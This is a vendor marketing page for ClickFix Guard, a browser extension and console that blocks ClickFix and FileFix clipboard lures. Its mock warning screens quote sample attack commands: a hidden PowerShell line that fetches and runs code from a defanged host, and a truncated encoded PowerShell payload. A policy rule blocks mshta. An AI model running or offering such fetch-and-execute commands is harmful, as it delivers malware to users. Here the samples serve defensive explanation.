Clipboard-Layer Defense

ClickFix ends at the clipboard.

ClickFix and FileFix turn your own users into the delivery mechanism - no exploit, no attachment, nothing for antivirus to catch. ClickFix Guard intercepts the malicious command the instant a site tries to plant it, before your user ever hits paste.

 Deploys as a managed browser extension  ·  Live in minutes  ·  No agent, no endpoint reboot

Command blocked
Clipboard clean
account-verify-human​.top/captcha
Northwind IT
BLOCKED: this site tried to put a command on your clipboard

account-verify-human.top tried to copy this command:

powershell -w h -nop -c "iex(irm https://a[.]top/x)"

Sites that ask you to paste into Run, Terminal or PowerShell are almost always scams - even when they look like a CAPTCHA. Don't run anything this page asks you to.

Protected by Northwind ITWhat is this?
The attack nobody's stopping

A fake CAPTCHA. Three keystrokes. Game over.

ClickFix skips the exploit entirely. The page shows a “verify you're human” box, tells the user to press Win+R, paste, and hit Enter - and the payload runs with the user's own hands. FileFix does the same through the File Explorer address bar. It's one of the fastest-growing initial-access techniques in the wild, and your stack was never built to see it.

Antivirus

Nothing to scan

No file touches disk. The “malware” is a line of text on the clipboard until the user runs it themselves.

EDR

Sees it too late

By the time PowerShell spawns, the command is already executing. Detection becomes incident response.

Email & web filters

Never in the path

The lure is a normal-looking web page - often on a brand-new domain that no blocklist has caught up to.

ClickFix Guard

The layer built for exactly this

We don't chase the payload - we own the clipboard. The malicious command is replaced the moment it's written, so there's nothing to paste, nothing to run, and nothing to clean up.

How it works

Intercept. Block. Decide.

Three moves, all at the browser - no endpoint agent, no proxy, no reboot.

1

Intercept

ClickFix Guard wraps the clipboard API in every tab. When a page writes something that looks like a shell command, we catch it at the source - before it's ever pasteable.

2

Block

The payload is swapped out and a full-screen warning takes over the page - branded as your team, not a scary extension. The real command never reaches the clipboard or its history.

3

Decide

Genuinely need it? The user requests access in one click. Automated triage weighs the domain's reputation and the command itself, then approves, denies, or escalates to your team.

The product

One console. Total control.

From the block screen your users see to the policy engine your team runs - here's the real thing.

get-verified​.click/human-check
Northwind IT
BLOCKED: this site tried to put a command on your clipboard

get-verified.click tried to copy this command:

cmd /c start /min powershell -e SQBFAFgAKA...

This looked like a “verify you're human” step. It isn't. Don't paste or run anything this page asked you to.

Protected by Northwind ITWhat is this?

A hijacked page becomes a teaching moment. Fully brandable - your logo, colors and copy - so users trust it and learn to spot the lure.

app.clickfixguard​.com/dashboard
Dashboard
Last 7 days · all clients
Attacks blocked
1,284
Would-block
312
Requests
47
Devices
2,190
Blocks vs. would-block
Fleet health
97%
enforcing

Blocks, would-blocks, open requests and enforcement coverage - status colors where they mean something, monochrome where they don't.

app.clickfixguard​.com/requests/8f3a…
Access request pending
payroll-portal-login.help · requested by [email protected]
Automated triage: malicious - recommends deny (high confidence)

Brand-new domain impersonating a payroll portal, staging an obfuscated PowerShell download. No legitimate reason to run this.

Site
payroll-portal-login.help
Detected
powershell iex
Domain reputation high risk suggests block
rdap registered 2 days ago - a hallmark of ClickFix lures
urlhaus listed on URLhaus
safe_browsing flagged by Google Safe Browsing
virustotal 3 engine(s) flagged it
cloudflare_radar not in Radar's popularity ranking

Every request carries a live reputation verdict - RDAP domain age, URLhaus, Safe Browsing, VirusTotal and Cloudflare Radar - plus an automated recommendation. Run it advisory, or let it act autonomously above a confidence threshold you set.

app.clickfixguard​.com/policy
Global policy
Rules run in priority order - first match wins. Drag to reorder.
OrderActionSiteContentNote
10allowdocs.docker.comcommand typevendor install steps
20allow*.corp-intra.netanythinginternal tooling
30block *command type · mshtanever allowed
100block *anythingdefault-deny catch-all

Think like a firewall: specific carve-outs on top, a locked default-deny at the bottom. Approvals slot themselves above whatever's blocking them, so “Always allow” actually works - automatically.

app.clickfixguard​.com/audit
Audit log
Every state change and sign-in across the console. Newest first.
WhenWho · actionTargetStatus
2m ago[email protected] · requests.resolvepayroll-portal…200
14m ago[email protected] · rules.reorderglobal policy200
1h agoautomated triage · requests.resolvefake-fix.top200
3h agounknown · auth.loginbad password401
3h ago[email protected] · users.create[email protected]201

Nothing happens off the record. Actor, action, target, IP and status on every mutation and login - with failed sign-ins captured too.

The platform

Everything a serious defender needs

Protection is the start. ClickFix Guard is a full operations console for running clipboard defense at scale.

Automated triage

Automated analysis of every access request - the command it staged plus the domain's reputation. Advisory or autonomous, with a confidence threshold you control and fail-safe escalation to a human.

Domain reputation

RDAP age, URLhaus, Google Safe Browsing, VirusTotal and Cloudflare Radar - folded into one verdict on every request.

Firewall-style policy

Allow and block rules with drag-to-reorder priority. First match wins, with locked global rules tenants can't override.

Full audit trail

Every decision, login, role change and policy edit - actor, target, IP and status. Nothing off the record.

Enterprise auth

Custom permission-based roles, TOTP and passkeys, and org-wide mandatory MFA enforced at the door.

Approve from anywhere

One-tap approve/deny straight from Microsoft Teams or ntfy - even from your phone, no login required (or require sign-in for high-security tenants).

Your brand, front and center

Logo, colors and copy on the block screen. Users see IT they trust, and learn to recognize the lure.

Learn before you enforce

Run in audit mode to see what would block, get readiness signals, then flip to enforce with confidence.

Minutes to deploy

A managed browser extension and a policy bundle. No endpoint agent, no proxy, no reboots.

Built for MSPs & MSSPs

Multi-tenant from the first line of code.

Every client isolated. Every technician scoped to exactly the tenants they manage. One policy engine, branded per client, run from one console.

  • Per-client isolation - rules, events, branding and reputation, cleanly separated.
  • Scoped technicians - all clients, a chosen set, one, or all-except. Enforced across every API.
  • Global + local policy - set org-wide guardrails, let each client carve out exceptions on top.
  • White-label block screen - each client's end users see their own IT brand.
Start free trial →
app.clickfixguard​.com/clients
Clients
6 tenants · 2,190 devices reporting
ClientModeDevicesBlocks (7d)
Acme Manufacturingenforce640418
Northwind Healthenforce512377
Contoso Legalaudit21096
Fabrikam Retailenforce488301
Tailspin Logisticsaudit34092

Antivirus won't catch it. EDR sees it too late.
We built the category that does.

ClickFix Guard is the defense designed for clipboard-borne social engineering - a threat class that didn't have an answer until now.

Get ahead of ClickFix

Turn on clipboard defense today.

Start a free trial, deploy the extension to a pilot group, and watch the blocks roll in. Flip to enforce when you're ready.

Free trial → paid. No credit card to start. No sales call required.